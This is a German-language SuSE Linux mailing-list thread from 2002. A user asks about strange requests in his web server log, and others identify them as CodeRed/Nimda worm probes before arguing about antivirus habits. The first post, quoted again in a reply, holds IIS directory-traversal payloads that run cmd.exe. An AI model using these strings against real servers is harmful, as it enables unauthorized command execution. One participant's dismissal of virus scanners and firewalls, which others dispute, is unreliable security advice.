Ext. Zugriffe auf Webserver...

Ekki Plicht

3 Jan 2002 3 Jan '02

03:00

Hi Liste, da ich noch ziemlich neu im Linuxgeschäft bin, eine dumme Frage: Im Access-Log meines lokalen Webservers tauchen Zugriffe von ip-Adressen ausserhalb meines LANs auf. Die Adressen gehören zum gleichen Pool wie mein Provider. Darf ich davon ausgehen das jemand mit einem Portscanner meinen Server entdeckt hat während ich online war, und dann versucht hat darauf zuzugreifen? Ich vermute mal, das die Einträge (s.u.) darauf hinweisen, das verschiedene Exploits ausprobiert wurden. Danke für Hinweise, Ekki Einträge sehen z.B. so aus: xx.xx.xx.xx - - [02/Jan/2002:22:02:13 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+di xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+di xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../ xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:16 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:16 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:16 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307

Show replies by date

Marko Hoffmann

3 Jan 3 Jan

03:41

Hallo Ekki, das ist ein Wurm! Brauchst aber keine Angst haben...der greift Windoof Systeme an. Marko

...

Einträge sehen z.B. so aus: xx.xx.xx.xx - - [02/Jan/2002:22:02:13 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+di xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+di xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../ xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:16 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:16 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:16 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307

-- Um die Liste abzubestellen, schicken Sie eine Mail an: suse-linux-unsubscribe@suse.com Um eine Liste aller verfügbaren Kommandos zu bekommen, schicken Sie eine Mail an: suse-linux-help@suse.com

Christian Schneider

03:45

Hallo Ekki Plicht, am 03.01.2002 schriebst Du:

...

[..] Darf ich davon ausgehen das jemand mit einem Portscanner meinen Server entdeckt hat während ich online war, und dann versucht hat darauf zuzugreifen? Ich vermute mal, das die Einträge (s.u.) darauf hinweisen, das verschiedene Exploits ausprobiert wurden. [CodeRed I/II]

Willkommen auf dem Planeten Erde! 1.) Deinstallier deinen httpd, ftpd, smtpd, popd, ... 2.) Ruf www.securityfocus.com und www.cert.org auf 3.) [x] geh weg! Ich fasse es nicht.. es gibt doch tatsaechlich noch Menschen die noch nichts ueber Wuermer wie CodeRed und/oder Nimda gehoert haben. Wegen Leuten wie *dir* entstehen Schaeden in Millionenhoehe! Wegen Leuten wie *dir* ist es ueberhaupt erst moeglich, dasz sich solche Wuermer ausbreiten koennen! *PLONK* -- http://3d-crew.com ...and when people grow out of NT, they'll move to linux

B.Brodesser＠t-online.de

04:45

* Christian Schneider schrieb am 03.Jan.2002:

...

am 03.01.2002 schriebst Du:

Wer ist Du? Ändere das bitte, so macht es auf einer Mailingliste keinen Sinn.

...

...
Darf ich davon ausgehen das jemand mit einem Portscanner meinen Server entdeckt hat während ich online war, und dann versucht hat darauf zuzugreifen? Ich vermute mal, das die Einträge (s.u.) darauf hinweisen, das verschiedene Exploits ausprobiert wurden. [CodeRed I/II]

Willkommen auf dem Planeten Erde! 1.) Deinstallier deinen httpd, ftpd, smtpd, popd, ...

Hä? Wieso das?

...

2.) Ruf www.securityfocus.com und www.cert.org auf 3.) [x] geh weg!

Was soll das?

...

Ich fasse es nicht.. es gibt doch tatsaechlich noch Menschen die noch nichts ueber Wuermer wie CodeRed und/oder Nimda gehoert haben. Wegen Leuten wie *dir* entstehen Schaeden in Millionenhoehe! Wegen Leuten wie *dir* ist es ueberhaupt erst moeglich, dasz sich solche Wuermer ausbreiten koennen!

Ich muß gestehen, daß ich auch nicht viel mehr über diese Würmer weiß, als das es sie gibt. Und ist das schlimm? Was wichtiges weiß ich aber doch noch: Linux befällt es nicht und mit Linux kann man es nicht unbeabsichtigt verbreiten. Also warum sollten mich diese Würmer interessieren. Ob Du es glaubst oder nicht, es gibt auch Leute, die kein Windows installiert haben und außschließlich mit Linux arbeiten.

...

*PLONK*

Was soll das? Da hat anscheinend jemand ein Problem mit einem Wurm, fragt ganz anständig danach und Du setzt da ein PLONK darunter. Wenn ein Mensch einen Rechner kauft und ihm betreibt, dann muß er gleich über Würmer bescheid wissen, oder was? Ja, er sollte vielleicht, aber der Händler hat ihm nicht darauf hingewiesen. Außerdem geht es hier um Linux und nicht um Windows. Für Linux ist der Wurm nicht relevant. Bernd

Christian Schneider

06:27

* Bernd Brodesser wrote:

...

Wer ist Du? Ändere das bitte, so macht es auf einer Mailingliste keinen Sinn. Geaendert.

...

Hä? Wieso das? Wenn jemand nicht in der Lage ist, sich ausreichend ueber Sicherheitsluecken informieren, dann ist es IMHO "besser", wenn derjenige keinen Dienst anbietet (httpd, ftpd, ..). Das CodeRedI/II, Nimda unter Linux/Unix nicht relevant sind ist mir klar. Es geht hier lediglich darum, dasz ihm nichtmal die "beruehmtesten" Wuermer ein Begriff sind. Was passiert wenn wieder ein Wurm wie `Ramen' auftaucht?

...

...
2.) Ruf www.securityfocus.com und www.cert.org auf 3.) [x] geh weg! Was soll das? Letzteres (3.)) war/ist "uebertrieben" und wurde aus Affekt gepostet. Tut mir sorry und ich entschuldige mich hiermit bei ihm. Das sollte heiszen: 2.) Ruf www.securityfocus.com und www.cert.org auf 3.) Informiere dich ueber Sicherheitsluecken in den von dir verwendeten (und eingesetzten) Diensten.

...

Ich muß gestehen, daß ich auch nicht viel mehr über diese Würmer weiß, als das es sie gibt. Und ist das schlimm? Was wichtiges weiß ich aber doch noch: Linux befällt es nicht und mit Linux kann man es nicht unbeabsichtigt verbreiten. Also warum sollten mich diese Würmer interessieren. Ob Du es glaubst oder nicht, es gibt auch Leute, die kein Windows installiert haben und außschließlich mit Linux arbeiten. [...] Doch. Es gibt Wuermer und Viren fuer Linux (auch wenn das Haupteinfallstor der User ist). Ich weisz auch das es Leute gibt, dir nur mit Linux/Unix arbeiten und die W2K-CD als Untersteller fuer die Kaffeetasse dient.

...

Bernd Chris -- http://3d-crew.com Politically Correct UNIX(tm) System VI Release notes "man" pages are now called "person" pages.

Heiner Lamprecht

11:34

Am Donnerstag, 3. Januar 2002 06:27 schrieb Christian Schneider:

...

* Bernd Brodesser wrote:

...
Wer ist Du? Ändere das bitte, so macht es auf einer Mailingliste keinen Sinn.

Geaendert.

...
Hä? Wieso das?

Wenn jemand nicht in der Lage ist, sich ausreichend ueber Sicherheitsluecken informieren, dann ist es IMHO "besser", wenn derjenige keinen Dienst anbietet (httpd, ftpd, ..).

Er bietet auch keinen Dienst an. Schliesslich hat er sich gewundert, dass Zugriffe von ausserhalb seines LANs auftreten. Wenn man Ekki etwas vorhalten kann, dann höchstens, dass er versäumt hat, den Port 80 nach aussen dicht zu machen. Wenn ich nur LAN-intern einen Webserver laufen habe (z.B. für die ganze Doku), dann denke ich auch nicht über irgendwelche Würmer nach. Wenn ich aber in einer Mailingliste eine berechtigte Frage stelle, hoffe ich auf konstruktive Antworten. Wär ja ein guter Vorsatz für 2002, diese Hoffnung auch zu erfüllen ... Heiner -- Heiner Lamprecht Philosophenweg 79 D - 72076 Tuebingen Fon: +49-7071-600 162 Fax: +49-7071-600 164 heiner@kflog.de GnuPG - Key: E05AEAFC Fingerprint: 257A DFBF 4977 4585 77A0 3509 973B 92AA E05A EAFC

Martin Neuditschko

15:22

On Thu, Jan 03, 2002 at 06:27:48AM +0100, Christian Schneider wrote:

...

* Bernd Brodesser wrote:

...
Wer ist Du? Ändere das bitte, so macht es auf einer Mailingliste keinen Sinn. Geaendert.

...
Hä? Wieso das? Wenn jemand nicht in der Lage ist, sich ausreichend ueber Sicherheitsluecken informieren, dann ist es IMHO "besser", wenn derjenige keinen Dienst anbietet (httpd, ftpd, ..). Das CodeRedI/II, Nimda unter Linux/Unix nicht relevant sind ist mir klar. Es geht hier lediglich darum, dasz ihm nichtmal die "beruehmtesten" Wuermer ein Begriff sind. Was passiert wenn wieder ein Wurm wie `Ramen' auftaucht?

Na und? Ich habe jahrelang unter Windows gesurft, ohne Firewall. Außerdem habe ich nie einen Virenscanner laufen, weil er mir zu viel frisst und wenn ich merke, daß man z. B. manche Proggies nicht mehr starten konnte, dann habe ich mir halt einen gezogen, ihn die Viren entfernen lassen und wieder gelöscht. Letztes mal hat f-Prot über 100 Dateien aus dem system-Verzeichnis gelöscht weil er den Virus daraus nicht entfernen konnte, aber danach hat wieder alles so funktioniert wie es sollte. Was jeder persönlich macht ist doch vollkommen ihm selbst überlassen, oder?

...

...
...
3.) [x] geh weg! Was soll das? Letzteres (3.)) war/ist "uebertrieben" und wurde aus Affekt gepostet. Tut mir sorry und ich entschuldige mich hiermit bei ihm. Das sollte heiszen: 2.) Ruf www.securityfocus.com und www.cert.org auf 3.) Informiere dich ueber Sicherheitsluecken in den von dir verwendeten (und eingesetzten) Diensten.

So wie du schreibst sieht es aus, als wäre dir einmal ein riesiger Fehler dieser Art unterlaufen. -- mfg Martin Neuditschko

Christian Sprenger

15:57

New subject: AW: Ext. Zugriffe auf Webserver...

[...]

...

Na und? Ich habe jahrelang unter Windows gesurft, ohne Firewall. Außerdem habe ich nie einen Virenscanner laufen, weil er mir zu viel frisst und wenn ich merke, daß man z. B. manche Proggies nicht mehr starten konnte, dann habe ich mir halt einen gezogen, ihn die Viren entfernen lassen und wieder gelöscht. Letztes mal hat f-Prot über 100 Dateien aus dem system-Verzeichnis gelöscht weil er den Virus daraus nicht entfernen konnte, aber danach hat wieder alles so funktioniert wie es sollte. Was jeder persönlich macht ist doch vollkommen ihm selbst überlassen, oder?

Sorry, das ich mich auch noch in dieses Thema einmische, aber das nenne *ich* unverantworlich!!! Mag ja sein, das es im Netz immer noch Leute gibt, die mit der "Was geht mich das an"-Meinung unterwegs sind, aber so??? --------------------------------- Christian Sprenger Windhorst Electronics GmbH Systemadministration Werner-von-Siemens-Str. 6-10 32369 Rahden fon 0 57 71 / 9 12 - 0 fax 0 57 71 / 9 12 - 2 80 mailto:c.sprenger@windhorst.de http://www.windhorst.de

Martin Neuditschko

18:18

On Thu, Jan 03, 2002 at 03:57:11PM +0100, Christian Sprenger wrote:

...

[...]

...
Na und? Ich habe jahrelang unter Windows gesurft, ohne Firewall. Außerdem habe ich nie einen Virenscanner laufen, weil er mir zu viel frisst und wenn ich merke, daß man z. B. manche Proggies nicht mehr starten konnte, dann habe ich mir halt einen gezogen, ihn die Viren entfernen lassen und wieder gelöscht. Letztes mal hat f-Prot über 100 Dateien aus dem system-Verzeichnis gelöscht weil er den Virus daraus nicht entfernen konnte, aber danach hat wieder alles so funktioniert wie es sollte. Was jeder persönlich macht ist doch vollkommen ihm selbst überlassen, oder?

Sorry, das ich mich auch noch in dieses Thema einmische, aber das nenne *ich* unverantworlich!!! Mag ja sein, das es im Netz immer noch Leute gibt, die mit der "Was geht mich das an"-Meinung unterwegs sind, aber so???

Ich glaube, daß 3/4 der Windowsbenutzer (privat gesehen natürlich) keine Firewall installiert haben, und davon noch mal ca. die Hälfte keinen Virenscanner laufen hat. (Und ca. 20% der Windowsuser kennen sich selbst in Windows nicht mehr aus als das sie wissen wie man einschaltet, spielt oder Word, Excel, AutoCAD,... bedient und wieder abdreht.) -- mfg Martin Neuditschko

Christian Sprenger

18:31

New subject: AW: Ext. Zugriffe auf Webserver...

[...]

...

...
...
hat f-Prot über 100 Dateien aus dem system-Verzeichnis gelöscht weil er den Virus daraus nicht entfernen konnte, aber danach hat wieder alles so funktioniert wie es sollte. Was jeder persönlich macht ist doch vollkommen ihm selbst überlassen, oder?

Sorry, das ich mich auch noch in dieses Thema einmische, aber das nenne *ich* unverantworlich!!! Mag ja sein, das es im Netz immer noch Leute gibt, die mit der "Was geht mich das an"-Meinung unterwegs sind, aber so???

Ich glaube, daß 3/4 der Windowsbenutzer (privat gesehen natürlich) keine Firewall installiert haben, und davon noch mal ca. die Hälfte keinen Virenscanner laufen hat. (Und ca. 20% der Windowsuser kennen sich selbst in Windows nicht mehr aus als das sie wissen wie man einschaltet, spielt oder Word, Excel, AutoCAD,... bedient und wieder abdreht.) mfg Martin Neuditschko

Gerade unter Beachtung dieser Misstände sollte wohl jeder, der wenigsten ein bischen Plan hat (und dazu gehörst du doch, oder?), darauf achten nicht als frei Virenzuchstation zu fungieren!!! So jetzt ist gut mit diesem Thema, gehört ja auch nicht in die Liste... --------------------------------- Christian Sprenger Windhorst Electronics GmbH Systemadministration Werner-von-Siemens-Str. 6-10 32369 Rahden fon 0 57 71 / 9 12 - 0 fax 0 57 71 / 9 12 - 2 80 mailto:c.sprenger@windhorst.de http://www.windhorst.de

Manfred Tremmel

21:04

Am Donnerstag, 3. Januar 2002 18:18 schrieb Martin Neuditschko:

...

Ich glaube, daß 3/4 der Windowsbenutzer (privat gesehen natürlich) keine Firewall installiert haben, und davon noch mal ca. die Hälfte keinen Virenscanner laufen hat. (Und ca. 20% der Windowsuser kennen sich selbst in Windows nicht mehr aus als das sie wissen wie man einschaltet, spielt oder Word, Excel, AutoCAD,... bedient und wieder abdreht.)

Es gibt auch noch genügend Leute, die in Südafrika ohne Kondom geschlechtsverkehr praktizieren, obwohl bekannt ist, dass über 30% der geschlechtsreifen Bevölkerung HIV-Positiv ist. Es gibt nun mal Verhaltensweisen, die einem selbst und anderen gegenüber inakzeptabel sind. Leider darf aber nun jeder, der auf ein vorinstalliertes AOL-Symbol seines Windows-Desktop klicken kann ins Internet, obwohl die Schäden, die DAUs möglicherweise anrichten, zumindestens Finanziell, die von Autounfällen weit übersteigen können. Da es nun aber keinen gesetzlich vorgeschriebenen Internetführerschein und Internet-PC-TÜV gibt, dürfen wir uns weiterhin über überlastete/ ausgefallene Mailserver und volle Inboxen ärgern dürfen, wenn einem Kiddy langweilig wird und per Baukasten und einigen Mausklicks einem neuen Virus das Leben schenkt. -- Machs gut | http://www.iiv.de/schwinde/buerger/tremmel/ Manfred | http://www.knightsoft-net.de

Heimo Ponnath

16:49

Du willst uns verarschen Martin, oder?? Am Donnerstag, 3. Januar 2002 15:22 schrieb Martin Neuditschko:

...

Na und? Ich habe jahrelang unter Windows gesurft, ohne Firewall. Außerdem habe ich nie einen Virenscanner laufen, weil er mir zu viel frisst und wenn ich merke,... Was jeder persönlich macht ist doch vollkommen ihm selbst überlassen, oder?

Denn wenn das nicht als Satire gemeint ist, dann möchte ich Dich nur mal daran erinnern, daß daß Dein Computer damit schnell - evtl. ohne Dein Wissen - zu Virenquelle für tausende andere geworden sein kann. Aber ich gehe mal davon aus, daß Du einen Scherz gemacht hast. Gruß von Heimo -- Heimo Ponnath Webdesign, Rotenhäuserstr. 51, 21109 Hamburg Tel: 040-753 47 95,Fax: 040-752 68 03, http://www.heimo.de/

Jörg Zimmermann

18:43

Hi Liste, Martin Neuditschko wrote:

...

On Thu, Jan 03, 2002 at 06:27:48AM +0100, Christian Schneider wrote:

...
Wenn jemand nicht in der Lage ist, sich ausreichend ueber Sicherheitsluecken informieren, dann ist es IMHO "besser", wenn derjenige keinen Dienst anbietet (httpd, ftpd, ..). Das CodeRedI/II, Nimda unter Linux/Unix nicht relevant sind ist mir klar. Es geht hier lediglich darum, dasz ihm nichtmal die "beruehmtesten" Wuermer ein Begriff sind. Was passiert wenn wieder ein Wurm wie `Ramen' auftaucht?

Na und? Ich habe jahrelang unter Windows gesurft, ohne Firewall. Außerdem habe ich nie einen Virenscanner laufen, weil er mir zu viel frisst und wenn ich merke, daß man z. B. manche Proggies nicht mehr starten konnte, dann habe ich mir halt einen gezogen, ihn die Viren entfernen lassen und wieder gelöscht. Letztes mal hat f-Prot über 100 Dateien aus dem system-Verzeichnis gelöscht weil er den Virus daraus nicht entfernen konnte, aber danach hat wieder alles so funktioniert wie es sollte. Was jeder persönlich macht ist doch vollkommen ihm selbst überlassen, oder?

asoziale Einstellung. PLONK Und so einer lamentiert über mangelhafte Dateirechte unter Linux. mit freundlichen Grüßen Jörg Zimmermann ------------------------------------------- .xsiteing agentur für netzkommunikation 42117 wuppertal - friedrich-ebert-str. 141b tel: 0202/3097070 - fax: 0202/3097072

Heiner Lamprecht

19:06

Am Donnerstag, 3. Januar 2002 15:22 schrieb Martin Neuditschko:

...

Na und? Ich habe jahrelang unter Windows gesurft, ohne Firewall. Außerdem habe ich nie einen Virenscanner laufen, weil er mir zu viel frisst und wenn ich merke, daß man z. B. manche Proggies nicht mehr starten konnte, dann habe ich mir halt einen gezogen, ihn die Viren entfernen lassen und wieder gelöscht. Letztes mal hat f-Prot über 100 Dateien aus dem system-Verzeichnis gelöscht weil er den Virus daraus nicht entfernen konnte, aber danach hat wieder alles so funktioniert wie es sollte. Was jeder persönlich macht ist doch vollkommen ihm selbst überlassen, oder?

Klar. Deswegen bretter ich auch immer mit 120 durch 'ne Tempo 30-Zone. Wie, spielende Kinder auf der Strasse? Ach das macht die Flecken auf der Motorhaube ... Sorry Junge. Aber Du bist nicht allein auf der Welt. Sobald man sich irgendwo in der Öffentlichkeit bewegt, hat man eine gewisse Verantwortung. Nicht nur juristisch, sondern vor allem moralisch. Heiner -- Heiner Lamprecht Philosophenweg 79 D - 72076 Tuebingen Fon: +49-7071-600 162 Fax: +49-7071-600 164 heiner@kflog.de GnuPG - Key: E05AEAFC Fingerprint: 257A DFBF 4977 4585 77A0 3509 973B 92AA E05A EAFC

Martin Neuditschko

19:42

On Thu, Jan 03, 2002 at 07:06:11PM +0100, Heiner Lamprecht wrote:

...

Am Donnerstag, 3. Januar 2002 15:22 schrieb Martin Neuditschko:

...
Na und? Ich habe jahrelang unter Windows gesurft, ohne Firewall. Außerdem habe ich nie einen Virenscanner laufen, weil er mir zu viel frisst und wenn ich merke, daß man z. B. manche Proggies nicht mehr starten konnte, dann habe ich mir halt einen gezogen, ihn die Viren entfernen lassen und wieder gelöscht. Letztes mal hat f-Prot über 100 Dateien aus dem system-Verzeichnis gelöscht weil er den Virus daraus nicht entfernen konnte, aber danach hat wieder alles so funktioniert wie es sollte. Was jeder persönlich macht ist doch vollkommen ihm selbst überlassen, oder?

Klar. Deswegen bretter ich auch immer mit 120 durch 'ne Tempo 30-Zone.

Wie, spielende Kinder auf der Strasse? Ach das macht die Flecken auf der Motorhaube ...

Sorry Junge. Aber Du bist nicht allein auf der Welt. Sobald man sich irgendwo in der Öffentlichkeit bewegt, hat man eine gewisse Verantwortung. Nicht nur juristisch, sondern vor allem moralisch.

Das verstehe ich jetzt nicht ganz. Immer wenn ich mir einen Virus eingefangen habe, wußte ich das ich mir einen einfange. Das war 2 mal. Es waren so schöne pif-Attachments von Mails. Ich habe sie geöffnet un zu sehen wie schnell man merkt, das etwas nicht mehr richtig funzt. Und ich glaube niemand, der Spielt hat einen Virenscanner laufen. 1: Der Virenscanner hat einen Performanceverlust zur Folge. 2: Wenn der Virenscanner plötzlich auf der Platte zum Scannen anfängt kann man das Spiel sowieso vergessen. Meist ist man dann ganz schnell tot. Der Hauptgrund: Woher soll ich einen Virus bekommen? Ich hatte noch nie unvorhergesehen einen Virus. Die Viren die ich hatte habe ich selbst "gestartet". Die Viren haben immer nur das System befallen, nie eigene Daten was mich noch immer stutzig macht. PS: Aber was hat das mit den 120 km/h durch ne 30er-Zone zu tun? -- mfg Martin Neuditschko

Sebastian Helms

4 Jan 4 Jan

01:28

Moin Martin, * Martin Neuditschko schrieb am 03 Jan 2002:

...

Das verstehe ich jetzt nicht ganz. Immer wenn ich mir einen Virus eingefangen habe, wußte ich das ich mir einen einfange.

Na klar, deshalb haben sich die Würmer in letzter Zeit ja auch alle so rasend schnell verbreitet, weil man eben nicht auf ein Attachment klicken mußte, sondern weil die sich dank MS-Benutzerfreundlichkeit und Komfort ja gleich automatisch gestartet und installiert haben... *sigh* Sebastian -- Do not meddle in the affairs of Wizards, for they are subtle and quick to anger. Sebastian Helms - http://www.helms.sh - mailto:mail@helms.sh (PGP welcome) SuSE-Linux-Mailinglisten-FAQ: http://www.helms.sh/faq/

Martin Neuditschko

07:13

On Fri, Jan 04, 2002 at 01:28:16AM +0100, Sebastian Helms wrote:

...

Moin Martin,

* Martin Neuditschko schrieb am 03 Jan 2002:

...
Das verstehe ich jetzt nicht ganz. Immer wenn ich mir einen Virus eingefangen habe, wußte ich das ich mir einen einfange.

Na klar, deshalb haben sich die Würmer in letzter Zeit ja auch alle so rasend schnell verbreitet, weil man eben nicht auf ein Attachment klicken mußte, sondern weil die sich dank MS-Benutzerfreundlichkeit und Komfort ja gleich automatisch gestartet und installiert haben...

Naja, dann hatte ich bis jetzt halt immer Glück. Wenn ich mir Aufwand <-> Nutzen eines Virenscanners bei mir ansene, dann komme ich zu dem Schluß, daß der Aufwand viel höher ist. Wahrscheinlich muß mir einmal etwas passieren, damit ich einsehe, daß so ein Ding einen Nutzen hat. Außerdem verwende ich seit ich auch mit Linux arbeite für die meisten Mails sowieso mutt, daher -> wie soll ich da noch einen Virus bekommen? -- mfg Martin Neuditschko

Sebastian Helms

11:50

New subject: OT: Viren (was: Ext. Zugriffe auf Webserver...)

Moin Martin, * Martin Neuditschko schrieb am 04 Jan 2002:

...

On Fri, Jan 04, 2002 at 01:28:16AM +0100, Sebastian Helms wrote:

...
* Martin Neuditschko schrieb am 03 Jan 2002:

...
Das verstehe ich jetzt nicht ganz. Immer wenn ich mir einen Virus eingefangen habe, wußte ich das ich mir einen einfange.

Na klar, deshalb haben sich die Würmer in letzter Zeit ja auch alle so rasend schnell verbreitet, weil man eben nicht auf ein Attachment klicken mußte, sondern weil die sich dank MS-Benutzerfreundlichkeit und Komfort ja gleich automatisch gestartet und installiert haben...

Wenn ich mir Aufwand <-> Nutzen eines Virenscanners bei mir ansene, dann komme ich zu dem Schluß, daß der Aufwand viel höher ist.

Ich habe einen Virenscanner, der alle Downloads automatisch scannt und meine Platte, wenn ich ihn starte. Sonst nix, kein Virenwächter oder sowas.

...

Außerdem verwende ich seit ich auch mit Linux arbeite für die meisten Mails sowieso mutt, daher -> wie soll ich da noch einen Virus bekommen?

Übers surfen mit IE. Gruß, Sebastian -- Do not meddle in the affairs of Wizards, for they are subtle and quick to anger. Sebastian Helms - http://www.helms.sh - mailto:mail@helms.sh (PGP welcome) SuSE-Linux-Mailinglisten-FAQ: http://www.helms.sh/faq/

Florian Gross

17:26

* Martin Neuditschko textete am 04.01.02:

...

Naja, dann hatte ich bis jetzt halt immer Glück. Wenn ich mir Aufwand <-> Nutzen eines Virenscanners bei mir ansene, dann komme ich zu dem Schluß, daß der Aufwand viel höher ist. Wahrscheinlich muß mir einmal etwas passieren, damit ich einsehe, daß so ein Ding einen Nutzen hat.

ACK! Ich wünsche dir einen Virus, der dir mal wirklich _alles_ plattmacht. Dann änderst du deine Einstellung vielleicht. cu flo, solche Argumente wie deine sind echt klasse -- jeder darf die Sig's unter der Voraussetzung verwenden das er die erste Zeile der Sig's mit der Url, mit postet (andernfalls werden Urheberrechte verletzt und auf der ganzen Welt bricht Anarchie aus und Deutschland fällt ins Mittelalter zurück ;-), [Steffen H. Hillner im WWW]

Andreas Allgeyer

19:59

Am Freitag, 4. Januar 2002 17:26 schrieb Florian Gross:

...

* Martin Neuditschko textete am 04.01.02:

...
Naja, dann hatte ich bis jetzt halt immer Glück. Wenn ich mir Aufwand <-> Nutzen eines Virenscanners bei mir ansene, dann komme ich zu dem Schluß, daß der Aufwand viel höher ist. Wahrscheinlich muß mir einmal etwas passieren, damit ich einsehe, daß so ein Ding einen Nutzen hat.

ACK! Ich wünsche dir einen Virus, der dir mal wirklich _alles_ plattmacht. Dann änderst du deine Einstellung vielleicht.

Das wünsche ich eigentlich niemanden. Nicht mal, wenn er sich selbst - aus Fahrlässigkeit - zum Verteiler macht. Beste Grüße Andreas -- http://www.jazznrhythm.de http://www.atomicagebayoubeat.com

Martin Neuditschko

21:08

On Fri, Jan 04, 2002 at 07:59:08PM +0100, Andreas Allgeyer wrote:

...

Am Freitag, 4. Januar 2002 17:26 schrieb Florian Gross:

...
* Martin Neuditschko textete am 04.01.02:

...
Naja, dann hatte ich bis jetzt halt immer Glück. Wenn ich mir Aufwand <-> Nutzen eines Virenscanners bei mir ansene, dann komme ich zu dem Schluß, daß der Aufwand viel höher ist. Wahrscheinlich muß mir einmal etwas passieren, damit ich einsehe, daß so ein Ding einen Nutzen hat.

ACK! Ich wünsche dir einen Virus, der dir mal wirklich _alles_ plattmacht. Dann änderst du deine Einstellung vielleicht.

Das wünsche ich eigentlich niemanden. Nicht mal, wenn er sich selbst - aus Fahrlässigkeit - zum Verteiler macht.

Ist ja nicht direkt Fahrlässigkeit, sondern die Einstellung keine Performance an so etwas abgeben zu wollen. Ich habe halt nur einen 700er MHz Athlon - noch dazu mit nur 128 MB RAM, und um mit dem noch irgendetwas einigermaßen Spielen zu können braucht man ihm halt alles abverlangen was möglich ist. Aber vielleicht geht es ja auch über einen Remote-Betrieb des Antivirus (habe dafür einen neuen Thread eröffnet: Squid - Antivirus (auch wenn das "Squid" im Betreff wohl nicht gerade eine glückliche Wahl war). -- mfg Martin Neuditschko

Florian Gross

5 Jan 5 Jan

18:51

* Martin Neuditschko textete am 04.01.02:

...

On Fri, Jan 04, 2002 at 07:59:08PM +0100, Andreas Allgeyer wrote:

...
Am Freitag, 4. Januar 2002 17:26 schrieb Florian Gross:

...

...
...
ACK! Ich wünsche dir einen Virus, der dir mal wirklich _alles_ plattmacht. Dann änderst du deine Einstellung vielleicht.

Das wünsche ich eigentlich niemanden. Nicht mal, wenn er sich selbst - aus Fahrlässigkeit - zum Verteiler macht.

Ich kenne genug, die Virenschutz haben und trotzdem spielen. Und die haben keinen P4...

...

